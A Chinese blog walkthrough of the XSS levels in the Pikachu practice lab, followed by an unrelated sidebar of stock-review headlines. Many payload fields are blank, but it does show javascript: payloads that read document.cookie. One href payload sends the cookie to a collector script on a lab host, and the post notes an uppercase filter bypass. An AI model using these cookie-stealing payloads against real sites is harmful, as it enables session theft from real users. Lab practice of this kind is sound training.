pikachu-xss部分速通
创始人
2024-03-26 01:23:10
0次
pikachu-xss部分速通
🍉
🍉目录
- pikachu-xss部分速通
- 反射型xss(get)
- 反射性xss(post)
- 存储型xss
- DOM型xss、DOM型xss-x
- xss盲打
- xss之过滤
- xss之htmlspecialchars
- xss之href输出
- xss之js输出
反射型xss(get)
payload:
反射性xss(post)
payload:
存储型xss
payload:
DOM型xss、DOM型xss-x
payload:
javascript:`${alert(1)}`
javascript:alert(2)
javascript:var cookie = document.cookie;alert(cookie);
xss盲打
先说下xss后台用法,如果构造一个请求为http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie=value
那后台就会写入一条cookie信息,相当于模拟了一个xss窃取用户cookie的过程
payload:
xss之过滤
大写就能绕过
payload:
xss之htmlspecialchars
别用特殊符号
payload:
javascript:var cookie = document.cookie;alert(cookie);
xss之href输出
paylaod:
javascript:document.location="http://192.168.1.28/pikachu-master/pkxss/xcookie/cookie.php?cookie="+document.cookie
单击a标签后,后台是有cookie记录的
xss之js输出
payload:
'
相关内容
热门资讯
每周股票复盘:华依科技(688...
截至2025年12月26日收盘,华依科技(688071)报收于33.81元,较上周的32.34元上涨...
每周股票复盘:文灿股份(603...
截至2025年12月26日收盘,文灿股份(603348)报收于19.23元,较上周的19.5元下跌1...
每周股票复盘:中邮科技(688...
截至2025年12月26日收盘,中邮科技(688648)报收于58.51元,较上周的58.49元上涨...
每周股票复盘:蓝科高新(601...
截至2025年12月26日收盘,蓝科高新(601798)报收于8.99元,较上周的8.98元上涨0....
每周股票复盘:红豆股份(600...
截至2025年12月26日收盘,红豆股份(600400)报收于2.42元,较上周的2.5元下跌3.2...
每周股票复盘:金证股份(600...
截至2025年12月26日收盘,金证股份(600446)报收于15.75元,较上周的15.46元上涨...
每周股票复盘:日盈电子(603...
截至2025年12月26日收盘,日盈电子(603286)报收于59.5元,较上周的57.11元上涨4...
每周股票复盘:盐 田 港(00...
截至2025年12月26日收盘,盐 田 港(000088)报收于4.53元,较上周的4.52元上涨0...
每周股票复盘:广电网络(600...
截至2025年12月26日收盘,广电网络(600831)报收于4.2元,较上周的4.36元下跌3.6...
每周股票复盘:新疆火炬(603...
截至2025年12月26日收盘,新疆火炬(603080)报收于22.85元,较上周的22.73元上涨...